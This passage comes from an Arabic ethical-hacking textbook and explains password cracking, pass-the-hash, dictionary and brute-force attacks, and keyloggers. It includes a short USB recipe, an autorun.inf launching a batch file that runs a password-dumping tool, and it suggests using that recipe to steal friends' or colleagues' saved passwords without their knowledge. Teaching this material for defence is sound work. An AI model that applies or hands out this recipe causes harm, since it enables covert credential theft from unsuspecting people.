‫ﺑﺎﻟﮭﺎش اﻟﻣﺧزن ﻋﻠﻰ اﻟﻧظﺎم‪ .‬إذا وﺟدا ﺗﺷﺎﺑﮭﮫ ﺑﯾﻧﮭم‪ ،‬إذا ﻓﮭذه ﻛﻠﻣﺔ اﻟﻣرور اﻟﺻﺣﯾﺣﺔ اﻟﺗﻲ ﺗم اﺳﺗﺧداﻣﮭﺎ‪ .‬ﻟذﻟك‪ ،‬ﻛل ﻣﺎ ﻟدي اﻟﻣﮭﺎﺟﻣﯾن اﻟﻘﯾﺎم ﺑﮫ‬
‫ﻣن أﺟل ﻛﺳر ﻛﻠﻣﺔ اﻟﺳر ھو اﻟﺣﺻول ﻋﻠﻰ ﻧﺳﺧﺔ ﻣن اﻟﮭﺎش ﻓﻲ اﺗﺟﺎه واﺣد اﻟﻣﺧزﻧﺔ ﻋﻠﻰ اﻟﺧﺎدم‪ ،‬وﻣن ﺛم اﺳﺗﺧدام ﺧوارزﻣﯾﺔ ﺗوﻟﯾد اﻟﮭﺎش‬
‫اﻟﺧﺎﺻﺔ ﺑﮫ ﺣﺗﻰ ﯾﺣﺻل ﻋﻠﻰ ﺗطﺎﺑﻖ‪ .‬ﻣﻌظم أﻧظﻣﺔ ﻣﺎﯾﻛروﺳوﻓت‪ ،‬وﯾوﻧﯾﻛس‪ ،‬و ‪Netware‬ﻗد أﻋﻠﻧوا ﻋﻠﻰ اﻟﻣﻸ ﺧوارزﻣﯾﺎت اﻟﮭﺎش اﻟﺧﺎﺻﺔ‬
‫ﺑﮭم‪ .‬ھذا اﻟﮭﺎش ﯾﻣﻛن اﻟوﺻول اﻟﯾﮫ إﻣﺎ ﻋن ﺑﻌد أو ﻣﺣﻠﯾﺎ‪ .‬ﺑﻐض اﻟﻧظر ﻋن ﻛﯾف ﯾﻣﻛﻧﻧﺎ اﻟوﺻول إﻟﻰ اﻟﮭﺎش‪ ،‬ﻓﺎن اﻟﺧطوات واﻷدوات اﻟﻼزﻣﺔ‬
‫ﻟﻛﺳر ﻛﻠﻣﺎت اﻟﺳر ﻻ ﺗزال ھﻲ ﻧﻔﺳﮭﺎ‪.‬‬
‫ﯾﻣﻛن ﻟﻠﻣﮭﺎﺟﻣﯾن اﺳﺗﺧدام ﻣزﯾﺞ ﻣن أﺳﺎﻟﯾب اﻟﮭﺟوم ﻟﻠﺣد ﻣن اﻟوﻗت اﻟذي ﯾطﻠﺑﮫ ﻟﻛﺳر ﻛﻠﻣﺔ ﻣرور‪ .‬ﯾوﻓر اﻹﻧﺗرﻧت ﺗطﺑﯾﻘﺎت ﻣﺟﺎﻧﯾﺔ ﻟﻛﺳر ﻛﻠﻣﺔ‬
‫اﻟﻣرور ﻷﻧظﻣﺔ ‪ ،Netware ،NT‬وﯾوﻧﯾﻛس‪.‬‬

‫ھﻧﺎك ﻗواﺋم ﻟﻛﻠﻣﺎت اﻟﺳر اﻟﺗﻲ ﯾﻣﻛﻧﮭﺎ ﺗﻐذﯾﺔ ھذه ‪ cracker‬ﻟﺗﻧﻔﯾذ ھﺟوم اﻟﻘﺎﻣوس)‪ . (Dictionary attack‬ﻓﻲ أﺑﺳط أﺷﻛﺎﻟﮭﺎ‪ ،‬ﻓﺎن اﻟﺗﺷﻐﯾل‬
‫اﻵﻟﻲ )‪ (Automated‬ﯾﻧطوي ﻋﻠﻰ اﻟﻌﺛور ﻋﻠﻰ ﻣﺳﺗﺧدم ﺻﺎﻟﺢ وﺧوارزﻣﯾﺔ اﻟﺗﺷﻔﯾر اﻟﻣﺳﺗﺧدﻣﺔ ﺧﺎﺻﺗﮫ‪ ،‬واﻟﺣﺻول ﻋﻠﻰ ﻛﻠﻣﺎت اﻟﺳر‬
‫اﻟﻣﺷﻔرة‪ ،‬وﺧﻠﻖ ﻗﺎﺋﻣﺔ ﻣن ﺟﻣﯾﻊ ﻛﻠﻣﺎت اﻟﺳر اﻟﻣﻣﻛﻧﺔ‪ ،‬ﺗﺷﻔﯾر ﻛل ﻛﻠﻣﺔ‪ ،‬واﻟﺗﺣﻘﻖ ﻣن وﺟود أي ﺗﺳﺎو ﻣﻊ ھوﯾﺔ اﻟﻣﺳﺗﺧدم اﻟﻣﻌروﻓﺔ)‪. (user ID‬‬
‫وﺗﺗﻛرر ھذه اﻟﻌﻣﻠﯾﺔ ﺣﺗﻰ ﯾﺗم اﻟﺣﺻول ﻋﻠﻰ اﻟﻧﺗﺎﺋﺞ اﻟﻣرﺟوة أو ﯾﺗم اﺳﺗﻧﻔﺎد ﺟﻣﯾﻊ اﻟﺧﯾﺎرات‪.‬‬
‫ﻓﻲ أﺑﺳط أﺷﻛﺎﻟﮫ ﻓﺎن ﻛﺳر ﻛﻠﻣﺔ اﻟﺳر ﺗﺗﻛون ﻣن ﺟزأﯾن‪:‬‬
‫‪ -1‬ﺗﺣدﯾد ﻣوﻗﻊ وﺗﺣﻣﯾل ﻣﻠف ھﺎش ﻛﻠﻣﺔ اﻟﺳر ﻟﻠﻧظﺎم اﻟﻣﺳﺗﮭدف‪.‬‬
‫‪ -2‬اﺳﺗﺧدام اﻷدوات ﻟﺗﺣوﯾل ھﺎش )اﻟﻣﺷﻔرة( ﻛﻠﻣﺎت اﻟﺳر إﻟﻰ ﻛﻠﻣﺔ ﻣرور ﻋﺎدﯾﮫ‪.‬‬
‫ﻣﻌظم أﻧظﻣﺔ اﻟﺗﺷﻐﯾل ﻻ ﺗﺧزن ﻛﻠﻣﺔ اﻟﻣرور اﻟﺧﺎﺻﺔ ﺑك اﻟﺗﻲ ﺗدﺧﻠﮭﺎ ﻛﻘﯾﻣﺔ ﻋﺎدﯾﮫ‪ ،‬ﺑل أﻧﮭﺎ ﺗﺧزن ﻓﻲ ھﯾﺋﺔ ﻧﺳﺧﺔ ﻣﺷﻔرة ﻣن ﻛﻠﻣﺔ اﻟﻣرور‪.‬‬
‫وﯾﺳﻣﻰ ھذا اﻹﺻدار ﻣن اﻟﺗﺷﻔﯾر اﻟﮭﺎش)‪.(HASH‬‬
‫ﻣﻌظم أﻧظﻣﺔ اﻟﺗﺷﻐﯾل ﺗﺧزﯾن ھﺎش ﻛﻠﻣﺔ اﻟﻣرور اﻟﺧﺎﺻﺔ ﺑﮭم ﻓﻲ ﻣﻛﺎن واﺣد‪ .‬ھذا اﻟﻣﻠف )‪ (HASH‬ﻋﺎدة ﯾﺣﺗوي ﻋﻠﻰ ﻛﻠﻣﺎت اﻟﺳر اﻟﻣﺷﻔرة‬
‫ﻟﻌدة ﻣﺳﺗﺧدﻣﯾن وﺣﺳﺎﺑﺎت اﻟﻧظﺎم‪ .‬ﻟﻸﺳف‪ ،‬اﻟوﺻول إﻟﻰ ھﺎش ﻛﻠﻣﺔ اﻟﻣرور ﻟﯾﺳت ﺳوى ﻧﺻف اﻟﻣﻌرﻛﺔ ﻟﻣﺟرد ﻋرض أو ﺣﺗﻰ ﺣﻔظ ھﺎش‬
‫ﻛﻠﻣﺔ اﻟﻣرور ﻟﯾﺳت ﻛﺎﻓﯾﺔ ﻟﺗﺣدﯾد اﻟﻧص اﻟﻌﺎدي ﻟﻛﻠﻣﺔ اﻟﻣرور‪ .‬ذﻟك ﻷن ﻣن اﻟﻧﺎﺣﯾﺔ اﻟﻔﻧﯾﺔ ﻟﯾس ﻣن اﻟﻣﻔﺗرض أن ﯾﻛون ﻣن اﻟﻣﻣﻛن اﻟﻌﻣل اﻟﻰ‬
‫اﻟوراء أي ﺗﺣوﯾل اﻟﮭﺎش إﻟﻰ ﻧص ﻋﺎدي‪.‬‬

‫ﻣﻠﺣوظﮫ‪ :‬ھﻧﺎك ھﺟوم ﯾﺳﻣﻰ "‪ " Pass the hash‬اﻟذي ﯾﺳﻣﺢ ﻟك ﺑﺗﻐﯾر أو إﻋﺎدة إرﺳﺎل ﻗﯾﻣﺔ اﻟﮭﺎش ﻣن ﻛﻠﻣﺔ ﻣرور ﻣن أﺟل اﻟﻣﺻﺎدﻗﺔ‬
‫ﻣﻊ اﻟﺧدﻣﺔ اﻟﻣﺣﻣﯾﺔ‪ .‬ﻋﻧد اﺳﺗﺧدام ھذا اﻟﻧوع ﻣن اﻟﮭﺟوم‪ ،‬ﻓﻠﯾس ھﻧﺎك ﺣﺎﺟﺔ ﻟﻛﺳر ﻛﻠﻣﺔ اﻟﺳر واﻛﺗﺷﺎف ﻧﺳﺧﺗﮭﺎ اﻟﻐﯾر ﻣﺷﻔره‪.‬‬

‫ﻣن أﺟل اﻛﺗﺷﺎف اﻟﻧﺳﺧﺔ اﻟﻐﯾر ﻣﺷﻔرة ﻣن ﻛﻠﻣﺔ ﻣرور‪ ،‬ﻓﻧﺣن ﺑﺣﺎﺟﺔ إﻟﻰ ﺑﻌض ﻣن اﻟﺧطوات اﻟﻣﮭﻣﺔ‪:‬‬
‫‪ -‬اﻟﻌﺛور ﻋﻠﻰ ﻣﺳﺗﺧدم ﺻﺎﻟﺢ‪.‬‬
‫‪ -‬ﺗﺣدﯾد ﺧوارزﻣﯾﺔ اﻟﺗﺷﻔﯾر )اﻟﮭﺎش( اﻟﻣﺳﺗﺧدﻣﺔ‪.‬‬
‫‪ -‬اﻟﺣﺻول ﻋﻠﻰ ﻛﻠﻣﺎت اﻟﺳر اﻟﻣﺷﻔرة‪.‬‬
‫‪ -‬إﻧﺷﺎء ﻗﺎﺋﻣﺔ ﻣن ﻛﻠﻣﺎت اﻟﺳر اﻟﻣﻣﻛﻧﺔ‪.‬‬
‫‪ -‬ﺗﺷﻔﯾر ﻛل ﻛﻠﻣﺔ ﺑﺎﺳﺗﺧدام ﻧﻔس اﻟﺧوارزﻣﯾﺔ‪.‬‬
‫‪ -‬ﻣﻌرﻓﺔ ﻣﺎ إذا ﻛﺎن ھﻧﺎك ﺗطﺎﺑﻖ ﻟﻛل ھوﯾﺔ اﻟﻣﺳﺗﺧدم‪.‬‬
‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬
‫‪337‬‬

‫‪Performing Automated Password Guessing‬‬


‫إذا ﻓﺷل اﻟﻣﮭﺎﺟم ﻓﻲ اﻟﮭﺟوم اﻟﯾدوي‪ ،‬ﻓﺄﻧﮫ ﯾﻣﻛن أن ﯾﺧﺗﺎر أن ﯾﺣول اﻟﻌﻣﻠﯾﺔ اﻟﻰ اﻟﮭﺟوم اﻷﻟﻰ )‪ .(Automated attack‬ھﻧﺎك اﻟﻌدﯾد ﻣن‬
‫اﻟﺑراﻣﺞ اﻟﻣﺟﺎﻧﯾﺔ اﻟﺗﻲ ﯾﻣﻛن أن ﺗﺳﺎﻋد ﻓﻲ ھذا اﻟﺟﮭد‪ .‬ﺑﻌض ھذه اﻟﺑراﻣﺞ اﻟﺣرة ھﻲ ‪،Jack the Ripper ،Legion‬‬
‫)‪ ، NetBIOS Auditing Tool (NAT‬اﻟﺦ‪ .‬أﺑﺳط ھذه اﻟطرق ھو اﻻﺳﺗﻔﺎدة ﻣن اﻷﻣر ‪ .net‬ھذا ﯾﻧطوي ﻋﻠﻰ اﻻﺳﺗﺧدام اﻟﺑﺳﯾط ﻟﻠﺣﻠﻘﺔ‬
‫‪ loop‬ﺑﺎﺳﺗﺧدام ﺷل ‪ NT/2000‬ﻣن اﺟل اﺳﺗﺧدام ھذا اﻻﻣر‪ .‬ﻛل ﻣﺎ ﯾﻔﻌﻠﮫ ﺟﻣﯾﻊ اﻟﻣﮭﺎﺟﻣﯾن ھو إﻧﺷﺎء ﻣﻠف ﺑﺳﯾط ﺑﮫ اﺳم اﻟﻣﺳﺗﺧدم وﻛﻠﻣﺔ‬
‫اﻟﺳر‪ .‬ﺛم ﯾﻣﻛن اﻟرﺟوع اﻟﻰ ھذا اﻟﻣﻠف ﻣن ﺧﻼل اﻷﻣر ‪.FOR‬‬

‫‪ Automated password attacks‬ﯾﻣﻛن ﺗﺻﻧﯾﻔﮭﺎ ﻋﻠﻰ اﻟﻧﺣو اﻟﺗﺎﻟﻲ‪:‬‬

‫‪ A simple dictionary attack -1‬واﻟذى ﯾﺷﻣل ﺗﺣﻣﯾل ﻣﻠف اﻟﻘﺎﻣوس )اﻟﻣﻠف اﻟﻧﺻﻲ اﻟذى ﯾﺣﺗوى ﻛﻠﻣﺎت اﻟﻘﺎﻣوس( ﻓﻲ ﺗطﺑﯾﻖ‬
‫ﻛﺳر ﻛﻠﻣﺎت اﻟﻣرور ﻣﺛل ‪ LOphtCrack‬أو ‪ ،John the Ripper‬ﺛم ﺗﺷﻐﯾﻠﮫ ﺿد ﺣﺳﺎﺑﺎت اﻟﻣﺳﺗﺧدﻣﯾن ﺣﯾث ﯾوﺟد اﻟﺗطﺑﯾﻖ‪.‬‬
‫ھﺟﻣﺎت اﻟﻘﺎﻣوس )‪ (Dictionary attack‬ھﻲ أﻛﺛر ﻓﻌﺎﻟﯾﺔ ﻣﻊ اﻟﻛﻠﻣﺎت اﻟطوﯾﻠﺔ‪.‬‬
‫‪ The brute force method -2‬ھو اﻷﻛﺛر ﺷﻣوﻻ‪ ،‬ﻋﻠﻰ اﻟرﻏم ﻣن ﺑطﺋﮫ‪ .‬ﻋﺎدة ﻣﺎ ﯾﺣﺎول ﻛل ﺣرف ﻣﻣﻛن‪ ،‬وﺗرﻛﯾﺑﺎت اﻷرﻗﺎم ﻓﻲ‬
‫اﻻﺳﺗﻛﺷﺎف اﻵﻟﻲ)‪. (automated exploration‬‬
‫‪ A hybrid approach -3‬ھو واﺣد ﯾﺟﻣﻊ ﺑﯾن ﻣﯾزات ﻛل ﻣن اﻷﺳﺎﻟﯾب اﻟﺳﺎﺑﻘﺔ‪ .‬وﻋﺎدة ﻣﺎ ﯾﺑدأ ﻣﻊ اﻟﻘﺎﻣوس‪ ،‬ﺛم ﯾﺣﺎول ﺗرﻛﯾﺑﺎت ﻣﺛل‬
‫ﻛﻠﻣﺗﯾن ﻣﻌﺎ أو ﻛﻠﻣﺔ وأرﻗﺎم‪.‬‬
‫ﯾﻣﯾل اﻟﻣﺳﺗﺧدﻣﯾن إﻟﻰ اﻣﺗﻼك ﻛﻠﻣﺎت ﺳر ﺿﻌﯾﻔﺔ ﻷﻧﮭم ﻻ ﯾﻌرﻓون ﻣﺎ ھو ﺷﻛل ﻛﻠﻣﺎت اﻟﻣرور اﻟﻘوﯾﺔ‪ ،‬وﺑﺎﻟﺗﺎﻟﻲ‪ ،‬ﻻ ﯾﻌرﻓون ﻛﯾﻔﯾﺔ إﻧﺷﺎء ﻛﻠﻣﺎت‬
‫ﻣرور ﻗوﯾﺔ ﻟﺣﺳﺎﺑﺎﺗﮭم‪ .‬ﻛﻣﺎ ھو ﻣﺑﯾن‪ ،‬وھذا ﯾﺗرك ﻛﻠﻣﺎت اﻟﺳر ﻣﻔﺗوﺣﺔ ﻟﻠﮭﺟوم‪.‬‬

‫‪Stealing Passwords Using Usb Drives‬‬


‫ﺳرﻗﺔ ﻛﻠﻣﺎت اﻟﺳر ﺑﺎﺳﺗﺧدام ﻣﺣرك أﻗراص ‪ USB‬ھو ﻧﮭﺞ ﻣﺎدي )‪ (physical approach‬ﻟﻘرﺻﻧﺔ ﻛﻠﻣﺎت اﻟﻣرور اﻟﻣﺧزﻧﺔ ﻓﻲ ﺟﮭﺎز‬
‫اﻟﻛﻣﺑﯾوﺗر‪ .‬ﯾﻣﻛن اﻟﻣﮭﺎﺟﻣﯾن ﺳرﻗﺔ ﻛﻠﻣﺎت اﻟﺳر ﺑﺎﺳﺗﺧدام ﻣﺣرك أﻗراص ‪ USB‬واﻟﺗطﺑﯾﻘﺎت اﻟﻣﺧﺗﻠﻔﺔ‪ .‬اﻟﻧﺎس اﻟذﯾن ﻟدﯾﮭم ﺣﺳﺎﺑﺎت ﻣﺗﻌددة ﻋﻠﻰ‬
‫اﻻﻧﺗرﻧت ﻋﺎدة ﺗﺧزن أﺳﻣﺎء اﻟﻣﺳﺗﺧدﻣﯾن وﻛﻠﻣﺎت اﻟﻣرور اﻟﺧﺎﺻﺔ ﺑﮭم ﻋﻠﻰ ﺳﺑﯾل اﻻﺣﺗﯾﺎط ﻻﺳﺗﺧداﻣﮭم إذا ﻣﺎ ﻧﺳﺎھم‪ .‬ﯾﻣﻛﻧك اﺳﺗرداد أو ﺳرﻗﺔ‬
‫وﺛﺎﺋﻖ اﻟﺗﻔوﯾض ھذه ﺑﺎﺳﺗﺧدام ﻣﺣرك أﻗراص‪. USB‬‬
‫اﻟﻧﮭﺞ اﻟﻣﺎدي )‪(physical approach‬ھو أﻣر ﺑﺎﻟﻎ اﻷھﻣﯾﺔ ﺑﺎﻟﻧﺳﺑﺔ ﻟﻠﻘرﺻﻧﺔ ﻛﻠﻣﺎت اﻟﺳر‪ .‬ﯾﻣﻛن ﻟﻠﻣرء ﺳرﻗﺔ ﻛﻠﻣﺎت اﻟﻣرور ﺑﺎﺳﺗﺧدام‬
‫ﻣﺣرك أﻗراص ‪ USB‬واﻟﺗطﺑﯾﻘﺎت‪ .‬ھذا اﻷﺳﻠوب ﯾﻧطﺑﻖ ﻋﻠﻰ ﻗرﺻﻧﺔ ﻛﻠﻣﺎت اﻟﻣرور اﻟﻣﺧزﻧﺔ ﻓﻲ أي ﺟﮭﺎز ﻛﻣﺑﯾوﺗر‪ .‬ﻣﻌظم اﻟﻧﺎس اﻟﻣﺷﺗرﻛﺔ‬
‫ﻓﻲ ﻋدد ﻛﺑﯾر ﻣن اﻟﻣواﻗﻊ ﻋﺎدة ﺗﻘوم ﺑﺗﺧزﯾن ﻛﻠﻣﺎت اﻟﻣرور اﻟﺧﺎﺻﺔ ﺑﮭم ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر ﻣن أﺟل ﺗذﻛرھﺎ‪ .‬ﯾﻣﻛن ﻟﻠﻣرء ﻣﺣﺎوﻟﺔ اﻧﺗﺷﺎﻟﮭﺎ ﺗﻠﻘﺎﺋﯾﺎ‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪338‬‬

‫ﺑﺎﺳﺗﺧدام ﻣﺣرك أﻗراص‪ . USB‬ھذا ﯾﺗطﻠب ﺗوﺻﯾل ‪ USB‬ﻓﻲ أي ﻣﻧﻔذ ﻟﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر اﻟذي ﺗم ﺗﺧزﯾن ﻛﻠﻣﺎت اﻟﺳر‪ .‬ھذه اﻟﺣﯾﻠﺔ ھﻲ ﻗﺎﺑﻠﺔ‬
‫ﻟﻠﺗطﺑﯾﻖ ل ﻧظﺎم اﻟﺗﺷﻐﯾل‪ ، Windows XP‬وﯾﻧدوز ‪ ،7‬وﯾﻧدوز ﻓﯾﺳﺗﺎ‪ ،‬وﯾﻧدوز ‪.2000‬‬

‫ﺟﻣﯾﻊ اﻟﺗطﺑﯾﻘﺎت اﻟﻣدرﺟﺔ ﻓﻲ ‪ USB‬ھﻲ ﻣﺣﻣوﻟﺔ وﺧﻔﯾﻔﺔ ﺑﻣﺎ ﯾﻛﻔﻲ ﺑﺣﯾث ﯾﻣﻛن ﺗﺣﻣﯾﻠﮭﺎ ﻓﻲ ﻗرص ‪ USB‬ﻓﻲ ﺑﺿﻊ ﺛوان‪ .‬ﯾﻣﻛﻧك أﯾﺿﺎ ﻗرﺻﻧﺔ‬
‫ﻛﻠﻣﺎت اﻟﺳر اﻟﻣﺧزﻧﺔ اﻟﺧﺎﺻﺔ ﺑﺎﻠ ‪ .Messenger‬ﺑﺎﺳﺗﺧدام أدوات و‪ USB‬ﯾﻣﻛﻧك إﻧﺷﺎء ‪ rootkit‬اﻹﺧﺗراق ﻛﻠﻣﺎت اﻟﺳر ﻣن اﻟﻛﻣﺑﯾوﺗر‬
‫اﻟﮭدف‪.‬‬
‫ﺳرﻗﺔ ﻛﻠﻣﺎت اﻟﺳر ﺑﺎﺳﺗﺧدام ﺟﮭﺎز ‪ USB‬ﺗﺗم ﺑﻣﺳﺎﻋدة ﻣن اﻟﺧطوات اﻟﺗﺎﻟﯾﺔ‪:‬‬

‫‪ -1‬ﺗﺣﺗﺎج إﻟﻰ أدوات ﻗرﺻﻧﺔ ﻛﻠﻣﺎت اﻟﻣرور‪.‬‬


‫‪ -2‬ﻧﺳﺦ اﻟﻣﻠﻔﺎت اﻟذي ﻗﻣت ﺑﺗﺣﻣﯾﻠﮭﺎ ذات اﻻﻣﺗداد )‪ (.exe‬واﻟﺗﻲ ﺗﻛون أدوات ﻟﻘرﺻﻧﺔ ﻛﻠﻣﺔ ﻣرور اﻟﻰ ﻣﺣرك اﻷﻗراص ‪.USB‬‬
‫‪ -3‬إﻧﺷﺎء ﻣﺳﺗﻧد ﻓﺎرغ ووﺿﻊ اﻟﻣﺣﺗوﯾﺎت اﻟﺗﺎﻟﯾﺔ أو اﻷﻛواد اﻟﺗﺎﻟﯾﺔ ﻓﯾﮫ‪:‬‬
‫]‪[autorun‬‬
‫‪en=launch.bat‬‬
‫ﺑﻌد ﻛﺗﺎﺑﺔ ھذا اﻟﻣﺣﺗوى ﻓﻲ اﻟﻣﻔﻛرة‪ ،‬ﻧﺣﻔظ اﻟﻣﺳﺗﻧد ك ‪ autorun.inf‬وﻧﺳﺦ ھذا اﻟﻣﻠف إﻟﻰ ﻣﺣرك اﻷﻗراص ‪.USB‬‬

‫‪ -4‬ﻧﻘوم ﺑﺈﻧﺷﺎء ﻣﺳﺗﻧد اﺧر وﻧﻘوم ﺑﻛﺗﺎﺑﺔ اﻟﻣﺣﺗوﯾﺎت اﻟﺗﺎﻟﯾﺔ‪:‬‬


‫‪start pspv.exe/stext pspv.txt‬‬

‫ﺑﻌد ذﻟك‪ ،‬ﻧﻘوم ﺑﺣﻔظ اﻟﻣﻠف ك ‪ launch.bat‬وﻧﺳﺦ ھذا اﻟﻣﻠف إﻟﻰ ﻣﺣرك اﻷﻗراص ‪.USB‬‬
‫‪ -5‬إدراج ﻣﺣرك اﻷﻗراص ‪ USB‬وﻧﺎﻓذة اﻟﺗﺷﻐﯾل اﻟﺗﻠﻘﺎﺋﻲ اﻟﻣﻧﺑﺛﻘﺔ )‪.(if enabled‬‬
‫‪ -6‬ﯾﺗم ﺗﻧﻔﯾذ أدوات ﻗرﺻﻧﺔ ﻛﻠﻣﺎت اﻟﻣرور ﻓﻲ اﻟﺧﻠﻔﯾﺔ‪ ،‬وﯾﻣﻛن ﺗﺧزﯾن ﻛﻠﻣﺎت اﻟﻣرور ﻓﻲ ﻣﻠﻔﺎت ‪ TXT‬ﻓﻲ ﻣﺣرك اﻷﻗراص ‪.USB‬‬

‫ﺑﮭذه اﻟطرﯾﻘﺔ‪ ،‬ﯾﻣﻛﻧك إﻧﺷﺎء ‪ USB password recovery toolkit‬ﺧﺎص ﺑك واﺳﺗﺧداﻣﮫ ﻟﺳرﻗﺔ ﻛﻠﻣﺎت اﻟﻣرور اﻟﻣﺧزﻧﺔ ﻣن أﺻدﻗﺎﺋك أو‬
‫زﻣﻼﺋك ﻣن دون ﻋﻠﻣﮭم‪ .‬ھذه اﻟﻌﻣﻠﯾﺔ ﺗﺳﺗﻐرق ﺳوى ﺑﺿﻊ ﺛوان ﻻﺳﺗرداد ﻛﻠﻣﺎت اﻟﺳر‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪339‬‬

‫‪Stealing Passwords Using Keylogger‬‬


‫ﻛﻠﻣﺎ ﯾﺣﺗﺎج اﻟﻣﮭﺎﺟم ﻗرﺻﻧﺔ ﺷﻲء ﻣﺎ‪ ،‬ﻓﺄﻧﮫ ﯾﻔﻛر ﻋﺎدة ﺣول اﻟﺛﻐرات اﻟﻣﺣﺗﻣﻠﺔ ﻓﻲ اﻟﻌﻣﻠﯾﺔ ﺑرﻣﺗﮭﺎ‪ .‬ﻛﻠﻣﺎت اﻟﺳر ھﻲ ﻗطﻌﺔ ﻣن اﻟﺑﯾﺎﻧﺎت‬
‫اﻟﻣﺳﺗﺧدﻣﺔ ﻟﻠوﺻول إﻟﻰ ﺣﺳﺎب أو ﻧظﺎم‪ .‬اﺧﺗﯾﺎر ﻛﻠﻣﺎت ﻣرور ﻣﻌﻘدة ﯾﺟﻌل ﺣﺳﺎﺑﺎﺗك آﻣﻧﺔ وﯾﺻﻌب اﻟﻣﮭﻣﺔ ﻋﻠﻰ اﻟﻣﮭﺎﺟم‪ .‬ﻛﻠﻣﺔ اﻟﻣرور اﻟﻣﻌﻘدة‬
‫ﺗﺟﻌل ﻣن ﻣﮭﻣﺔ اﻟﻣﮭﺎﺟم ﺻﻌﺑﺔ وﻟﻛﻧﮭﺎ ﻟﯾﺳت ﻣﺳﺗﺣﯾﻠﺔ‪ .‬ﻛﻠﻣﺎت اﻟﻣرور ھﻲ ﻗطﻌﺔ ﻣن اﻟﺑﯾﺎﻧﺎت اﻟﺗﻲ ﺳﺗﻘدم إﻟﻰ ﻧظﺎم أو ﺗطﺑﯾﻖ ﻟﻠوﺻول إﻟﯾﮫ‪.‬‬
‫ﻋﺎدة ﻣﺎ ﯾﺗم إدﺧﺎل ﻛﻠﻣﺎت اﻟﻣرور ﻣن ﺧﻼل ﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ‪ .‬وﺑﺎﻟﺗﺎﻟﻲ‪ ،‬ﻓﺈذا ﻛﺎن اﻟﻣﮭﺎﺟم ﻟدﯾﮫ ﺑرﻧﺎﻣﺞ أو آﻟﯾﺔ ﻟﺗﺳﺟﯾل ﺿﻐطﺎت اﻟﻣﻔﺎﺗﯾﺢ وإرﺳﺎل‬
‫ﺗﻘرﯾر ﻋن ذﻟك‪ ،‬ﻓﯾﻛون اﻟﻣﮭﺎﺟم ﻟﮫ اﻟﻘدرة ﻋﻠﻰ ﺗﺣدﯾد ﻛﻠﻣﺎت اﻟﺳر ﺑﺳﮭوﻟﺔ‪ .‬اﻟﺑراﻣﺞ اﻟﺗﻲ ﺗﺳﻣﺢ ﻟﮭم ﻟﻠﻘﯾﺎم ﺑذﻟك ھﻲ ‪ ،Keyloggers‬وھو ﻧوع‬
‫ﻣن اﻟﺑرﻣﺟﯾﺎت اﻟﺧﺑﯾﺛﺔ‪ Keyloggers .‬ﯾﻣﻛﻧﮫ ﻛﺷف ﻛل ﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ اﻟﺗﻲ ﻗﺎم ﺑﮭﺎ اﻟﮭدف ﺑﻣﺎ ﻓﻲ ذﻟك أﺳﻣﺎء اﻟﻣﺳﺗﺧدﻣﯾن و ﻛﻠﻣﺎت‬
‫اﻟﻣرور ﻷي ﻣن اﻟﻣواﻗﻊ‪ Keyloggers .‬ﻋن ﺑﻌد ﯾﻣﻛن أن ﯾﻌطﻲ وﺻول اﻟﻣﮭﺎﺟم ﻟﯾس ﻓﻘط إﻟﻰ اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ واﻟﺣﺳﺎﺑﺎت ﻋﻠﻰ اﻻﻧﺗرﻧت‬
‫‪ ،‬وﻟﻛﻧﮫ ﯾﻣﻛن اﺧﺗراق اﻟﺗﻔﺎﺻﯾل اﻟﻣﺎﻟﯾﺔ اﻟﺧﺎﺻﺔ ﺑك ﻛذﻟك‪ .‬وﯾﺳﺗﺧدم ‪ Keyloggers‬ﻣن ﻗﺑل اﻟﻧﺎس ﻟﻠﻌﺛور ﻋﻠﻰ ﻗطﻌﺔ ﻣﻌﯾﻧﺔ ﻣن اﻟﻣﻌﻠوﻣﺎت‬
‫ﻣﺛل اﺳم اﻟﻣﺳﺗﺧدم أو ﻛﻠﻣﺔ اﻟﻣرور‪.‬‬

‫ﯾﻣﺛل اﻟﺗوﺿﯾﺢ اﻟﺗﺻوﯾري اﻟﺗﺎﻟﻲ طرﯾﻖ اﻟﻣﮭﺎﺟﻣﯾن ﻟﺳرﻗﺔ ﻛﻠﻣﺎت اﻟﻣرور ﺑﺎﺳﺗﺧدام ‪.Keyloggers‬‬

‫ﻋﻧد ﺳرﻗﺔ ﻛﻠﻣﺎت اﻟﻣرور‪ ،‬ﻓﺎن اﻟﻣﮭﺎﺟم ﯾﺻﯾب أوﻻ ‪ PC‬اﻟﺿﺣﯾﺔ ﻣﻊ ﺑرﻣﺟﯾﺎت ‪ .Keyloggers‬ﻋﻧد دﺧول اﻟﺿﺣﯾﺔ إﻟﻰ ﺧﺎدم اﻟدوﻣﯾن ﻣن‬
‫ﺧﻼل ﺑﯾﺎﻧﺎت اﻟدﺧول‪ ،‬ﻓﺎن ‪ Keyloggers‬ﺗﻠﻘﺎﺋﯾﺎ ﺗﻘوم ﺑﺈرﺳﺎل ﺑﯾﺎﻧﺎت اﻟدﺧول )اﺳم اﻟﻣﺳﺗﺧدم وﻛﻠﻣﺎت اﻟﺳر( إﻟﻰ اﻟﻣﮭﺎﺟم دون ﻋﻠم اﻟﺿﺣﯾﺔ‪.‬‬
‫ﺑﻣﺟرد ﺣﺻول اﻟﻣﮭﺎﺟم ﻋﻠﻰ ھذه اﻟﺑﯾﺎﻧﺎت اﻋﺗﻣﺎد ﻋﻠﻰ ﺗﺳﺟﯾل دﺧول اﻟﺿﺣﯾﺔ‪ ،‬ﻓﺎﻧﮫ ﯾﻘوم ﺑﺗﺳﺟﯾل اﻟدﺧول إﻟﻰ ﺧﺎدم اﻟدوﻣﯾن ورﺑﻣﺎ اﻟﻘﯾﺎم ﺑﺄي‬
‫ﻋﻣل أﺧر‪.‬‬

‫)‪Offline Password Attacks (HASH Attack‬‬

